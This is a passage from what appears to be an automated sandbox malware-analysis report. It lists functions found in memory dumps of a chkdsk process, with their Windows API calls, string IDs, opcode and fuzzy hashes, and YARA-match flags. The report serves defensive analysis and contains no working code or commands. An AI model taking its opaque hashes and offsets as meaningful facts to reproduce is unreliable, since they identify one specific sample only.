                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ef471dfb2e2e78ea95e5c874dd2ed0b06c78ce6ae25ea6b73fdd55f919cabc2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B390023120100802D6006598554C6C6101587E0301F92D416A5115555ED77588917131
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ff046da33d8ff7dda21b8f9f0b476e0e49c522544e8adb047764813cc30fb332
                                                                                                                                                                                                                                • Instruction ID: 70959a831562c6d84be7b94eb8a2188ace0e365a6de81a29abbea475d7905f25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff046da33d8ff7dda21b8f9f0b476e0e49c522544e8adb047764813cc30fb332
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E90023120100C42D60061584548BC6101587E0301F92C41BA0215654DD725C8517521
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 58f512a1f1b1fc8dcbed36163a7263fd0bc08b51de2ae2d01422071b276793c7
                                                                                                                                                                                                                                • Instruction ID: 8b9c41fcf57bbf9d8515aed5199c71a9963f79d8906a54dbe6466d36e5748ee5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58f512a1f1b1fc8dcbed36163a7263fd0bc08b51de2ae2d01422071b276793c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E790023120108C02D610615885487CA101587D0301F96C816A4515658DD7A588917121
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: d2740fb4e56cf6df44d39918b4b921172e52b282ea08be515a745012309a7df5
                                                                                                                                                                                                                                • Instruction ID: 9f16b4a1ba896d31b6ad79f0e48c03b1265d7a584873c4036ddf2ec7d096b65f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2740fb4e56cf6df44d39918b4b921172e52b282ea08be515a745012309a7df5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C890023160500C02D650715845587C6101587D0301F92C416A0115654DD7658A5576A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 05462A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213647625.0000000005519000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_53f0000_chkdsk.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 8f6383cfd62ef42ca0be5de35639079a9f2152706fc5b7291a12b4be0cb17d01
                                                                                                                                                                                                                                • Instruction ID: a13b6b7fec22a0f3ac461d9fc33e631c151fd491f8e7823f044b122e7d8a4b98
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6383cfd62ef42ca0be5de35639079a9f2152706fc5b7291a12b4be0cb17d01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF90027120200403460571584558696501A87E0201F92C426E1105590DD63588917125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00887300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 008873A8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                • Opcode ID: 07b016a1fee8177b095a040ff294a8ff3ad25087744a7a17c03097b4fc4c3d7c
                                                                                                                                                                                                                                • Instruction ID: b5a5f64a3c81cf2a35c7bc2e28dedcb04a95a90e0b770397c417ce06e6bcf178
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07b016a1fee8177b095a040ff294a8ff3ad25087744a7a17c03097b4fc4c3d7c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E319EB6605704ABD715EF68C8A1FABB7B8FF88700F10811DFA199B241D730E945CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008872F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 008873A8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                • Opcode ID: 197eb81aad253ceb8be2512152f048684f93ae5d963397c75ea9955d734d4ff9
                                                                                                                                                                                                                                • Instruction ID: a2f9dab815ce50eee2a6d4d7438cc91ecb9c520556832daeb7e72d5417e1e755
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 197eb81aad253ceb8be2512152f048684f93ae5d963397c75ea9955d734d4ff9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21D5B1501705ABD715EF68C8A1F6BB7B4FF48700F10811DFA199B242D774E445CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008888EE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00873B93), ref: 0088891D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                                • Opcode ID: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                                                                                                                                                                                                • Instruction ID: f4dbeaa377d2f2011f22df00d43792c8fd0cef9223d52d314e3dda0102dde209
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c12ec8d948933bb354d16f8afb2ce424dc6dfb751cdfcca622258ca01e1f6601
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CE01AB52042046BDB14EF58CC49EA777A9EF88750F014559F9195B241C631E910CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008888F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00873B93), ref: 0088891D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: .z`
                                                                                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                                • Instruction ID: ddd02d4577fea16f310df988c9dd6d7de2cddaaa9f6bfd424430b74e44a75bbe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E04FB52042046BD714EF59CC49EA777ACEF88750F014555FD0957241C630F910CBF0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00881760 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,00000000,00873AC6,00000000), ref: 00881777
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                • API String ID: 2538663250-2016760708
                                                                                                                                                                                                                                • Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                                                                                                                                • Instruction ID: 626af41a1bbadc1856403827fc144aab074bf14c77c1e9871ed77c207ed30276
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D314FB5A0020A9FDB00DFD8C8809EEB7B9FF88304B108559E515EB244DB75EE06CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008889F5 Relevance: 3.1, APIs: 2, Instructions: 83processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalLookupPrivilegeProcessValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 65721159-0
                                                                                                                                                                                                                                • Opcode ID: 33f3667f199e7b61afa116ae72c517892be617d35d31ac409d663826fb352d2a
                                                                                                                                                                                                                                • Instruction ID: a18312c637977e951be6668cb33f1d8ccbaa8a949d054d4ad16f4e6e6553fb4b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33f3667f199e7b61afa116ae72c517892be617d35d31ac409d663826fb352d2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 102122B2204108ABCB18DF98DC85EEB77A9EF88650F058259FA0D97241C630E811CBB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00877280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008772DA
                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008772FB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                                                                                                                                                                                                • Instruction ID: e5a495012de2494ed2969ca4ae3d7f4eed5d0b5f52c51ce2872ed166f037a9ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01A731A9022977E721B6989C03FBE776CEB40F51F144115FF08FA1C6E698A90687F6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00879B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00879BB2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                                                                                                • Instruction ID: a0573ef6472eb955bc8f2d31019dc44bcfadc15108e5d5f917a6ddfe6ba653ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49010CB5D0020DABDF10EAE4EC42F9DB3B8EB54318F008195E908D7285F631EA148B92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00888960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                                                • Instruction ID: 031529d38d18e3b631e47da1f2eaf0cd7cd496a969b52c46672f2024e2e61980
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301AFB2214108ABCB54DF8DDC84EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0088895D Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008889B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                • Opcode ID: 32fd021bcf649e48cdf4b8a56b4eb93fb2098e5c9897efcedbe0a826036c0b4d
                                                                                                                                                                                                                                • Instruction ID: 226892210f0e406dfb22d389d01896de5b1d50cc7931715292f99d11992c48a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32fd021bcf649e48cdf4b8a56b4eb93fb2098e5c9897efcedbe0a826036c0b4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB01F2B2214108BFCB44DF99DC84EEB33ADAF8C350F158209FA1DA3241CA30E801CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00887430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0087CCF0,?,?), ref: 0088746C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                • Opcode ID: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                                                                                                                                                                                • Instruction ID: 61553bcb3d1266fd3bc49c5072a4fdd0ef34551ab6156579cbd2c2d5ac0b8c7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9105e1c37fac6013095626d5dca2d108c43f6eb99556836844f3cecf00598bb3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E06D733813043AE22075AD9C02FA7B39CDB81B60F640026FA4DEA2C1D595F80142A9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 008888B0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00883536,?,00883CAF,00883CAF,?,00883536,?,?,?,?,?,00000000,00000000,?), ref: 008888DD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                                                • Instruction ID: 6b82e902dbda58582cc18dfd943150618eb5e4069457449a8595e2f8211a9aa2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABE012B5204208ABDB14EF99CC45EAB77ACEF88650F158559FA099B242C630F910CBB0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00888A4D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                • Opcode ID: 14912fa746234da3a388f5fa60583d672cb9a003d2fbc24ce0cf4d7aef5b3d3b
                                                                                                                                                                                                                                • Instruction ID: 43bdddc8cec44f76f534ada2d26ef5b32d828ae876e6a25e1e83637f47d4f947
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14912fa746234da3a388f5fa60583d672cb9a003d2fbc24ce0cf4d7aef5b3d3b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97E01AB56042046BDB10DF98DC85FEB37A9EF88650F118165F90D97241C535E911CBB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00888A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0087CFC2,0087CFC2,?,00000000,?,?), ref: 00888A80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_870000_chkdsk.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                                                • Instruction ID: 539b9ef9b8634e784a461a80c26fd6a54c8917b7434781c30d2401c3499badaa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FE01AB52002086BDB10EF49CC85EEB37ADEF88650F018155FA0957241C934E910CBF5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0087D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00877C83,?), ref: 0087D45B
                                                                                                                                                                                                                                Memory Dump Source
